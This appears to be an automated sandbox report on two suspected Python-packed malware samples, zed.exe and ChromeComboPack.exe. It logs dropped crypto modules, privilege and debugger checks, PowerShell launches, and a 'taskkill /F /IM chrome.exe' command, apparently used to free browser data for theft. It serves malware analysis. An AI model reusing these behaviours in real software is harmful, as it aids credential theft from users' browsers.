Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\python3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_tkinter.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_queue.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_wmi.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_socket.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\unicodedata.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_hashlib.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\unicodedata.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_decimal.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_lzma.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_wmi.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\python312.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_ctypes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_bz2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_overlapped.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_decimal.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_socket.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\select.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\pyexpat.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\unicodedata.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_lzma.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\select.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_32-18860
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-17581
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6060Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6980Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1924Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788Thread sleep count: 2419 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1052Thread sleep count: 484 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4800Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6876Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5309280 FindFirstFileExW,FindClose,6_2_00007FF7E5309280
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5321874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF7E5321874
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00007FF7E53083C0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9B7810 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,32_2_00007FF78C9B7810
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9B87E0 FindFirstFileExW,FindClose,32_2_00007FF78C9B87E0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9D2A84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_00007FF78C9D2A84
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000000.00000002.4874183283.000001EE2F1F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWonde%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000000E.00000002.3166041238.0000025B4BB4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000E.00000002.3166041238.0000025B4BB4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3081131778.00000132F844A000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8375000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWstem%SystemRoot%\system32\mswsock.dllhods of the socket object.
Source: powershell.exe, 0000000E.00000002.3166041238.0000025B4BB4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E531A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7E531A614
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 34_2_00007FFD8A19DB00 GetModuleHandleW,LoadLibraryW,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree,34_2_00007FFD8A19DB00
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5323480 GetProcessHeap,6_2_00007FF7E5323480
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E531A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7E531A614
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E530C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF7E530C8A0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E530D30C SetUnhandledExceptionFilter,6_2_00007FF7E530D30C
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E530D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7E530D12C
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 12_2_00007FFD8A252A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FFD8A252A70
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 12_2_00007FFD8A253028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FFD8A253028
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9BBE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_00007FF78C9BBE00
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9BC69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00007FF78C9BC69C
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9BC840 SetUnhandledExceptionFilter,32_2_00007FF78C9BC840
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9CB4F8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00007FF78C9CB4F8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 34_2_00007FFD8A19F674 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FFD8A19F674
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 34_2_00007FFD8A19F85C SetUnhandledExceptionFilter,34_2_00007FFD8A19F85C
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 34_2_00007FFD8A19E55C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00007FFD8A19E55C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe" Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe" Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe C:\Users\user\Documents\gogjothegoat\payload\zed.exeJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 34_2_00007FFD8A197CD0 PyArg_ParseTuple,PyExc_TypeError,PyErr_SetString,GetSecurityDescriptorDacl,free,SetSecurityDescriptorDacl,GetSecurityDescriptorOwner,free,GetSecurityDescriptorGroup,free,free,free,34_2_00007FFD8A197CD0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 34_2_00007FFD8A198B50 _PyArg_ParseTuple_SizeT,PyErr_Clear,_PyArg_ParseTuple_SizeT,PyErr_Clear,_PyArg_ParseTuple_SizeT,PySequence_Check,PyExc_TypeError,PyErr_SetString,PySequence_Size,PySequence_Tuple,_PyArg_ParseTuple_SizeT,_Py_Dealloc,AllocateAndInitializeSid,PyExc_ValueError,PyErr_SetString,_Py_NewReference,malloc,memset,memcpy,34_2_00007FFD8A198B50
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5329570 cpuid 6_2_00007FF7E5329570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
